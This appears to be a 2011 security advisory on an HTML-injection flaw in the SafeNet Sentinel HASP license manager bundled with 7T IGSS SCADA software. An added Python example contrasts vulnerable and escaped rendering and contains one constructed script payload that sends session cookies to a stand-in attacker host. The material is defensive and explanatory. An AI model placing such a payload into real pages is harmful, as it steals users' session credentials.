7T IGSS / SafeNet Sentinel Input Sanitization Vulnerability
December 12, 2011
Security researcher Carlos Mario Penagos Hollman of
Synapse-labs has identified an input sanitization
vulnerability in the third-party SafeNet Sentinel HASP
Software Rights Management (HASP-SRM) license manager
application that is embedded in the 7 Technologies (7T) IGSS
SCADA software.
SafeNet Sentinel HASP and 7T IGSS are prone to an
HTML-injection vulnerability because they fail to properly
sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in
the context of the affected site, potentially allowing the
attacker to steal cookie-based authentication credentials or
control how the site is rendered to the user. Other attacks
are also possible, including allowing an attacker to modify
the contents of a configuration file.
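The mechanism described above, as an added example that is not code from the advisory, SafeNet or 7T: a minimal server-side page render that reflects a user-supplied value into HTML. The first variant inserts the value verbatim, which is the HTML-injection pattern; the second escapes it so it cannot break out of text or attribute context. The page layout, the `host` parameter, the sample payload and the cookie header are constructed here for illustration; a third helper checks a Set-Cookie header for the HttpOnly flag, which blocks the cookie-theft outcome the advisory mentions even when injection succeeds.

```python
import html

# Constructed page template (not the real license manager UI): the value is
# reflected both in text context and inside a quoted attribute.
PAGE = (
    "<html><body><h1>License status</h1>"
    "<p>Host: {host}</p>"
    '<input name="host" value="{host}">'
    "</body></html>"
)


def render_vulnerable(host: str) -> str:
    """Reflects the value verbatim: any markup in it becomes part of the page."""
    return PAGE.format(host=host)


def render_hardened(host: str) -> str:
    """Escapes &, <, >, " and ' so the value stays inert in both contexts."""
    return PAGE.format(host=html.escape(host, quote=True))


def reflects_markup(rendered: str, payload: str) -> bool:
    """True if the raw payload survives unescaped, i.e. injection worked."""
    return payload in rendered


def cookie_is_httponly(set_cookie_header: str) -> bool:
    """True if the Set-Cookie header carries HttpOnly, which keeps the session
    cookie out of reach of injected script (document.cookie)."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" in attrs


# Constructed attacker input: closes the attribute, then exfiltrates cookies
# to a hypothetical attacker host.
PAYLOAD = (
    '"><script>new Image().src='
    '"http://attacker.example/?c="+document.cookie</script>'
)

if __name__ == "__main__":
    print("vulnerable reflects payload:",
          reflects_markup(render_vulnerable(PAYLOAD), PAYLOAD))
    print("hardened reflects payload:",
          reflects_markup(render_hardened(PAYLOAD), PAYLOAD))
    print("HttpOnly set:", cookie_is_httponly("session=abc; Path=/; HttpOnly"))
```

The escaping must cover quotes as well as angle brackets: escaping only `<` and `>` would still let the `">` prefix close the `value` attribute and inject new attributes such as an event handler.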
SafeNet has produced an updated version that mitigates this
vulnerability; the researcher has tested the update.
Affected products include:
- SafeNet Sentinel HASP SDK releases older than
Version 5.11
- Sentinel HASP Runtime installers older than Version
6.x
- 7 Technologies (7T) IGSS Version 7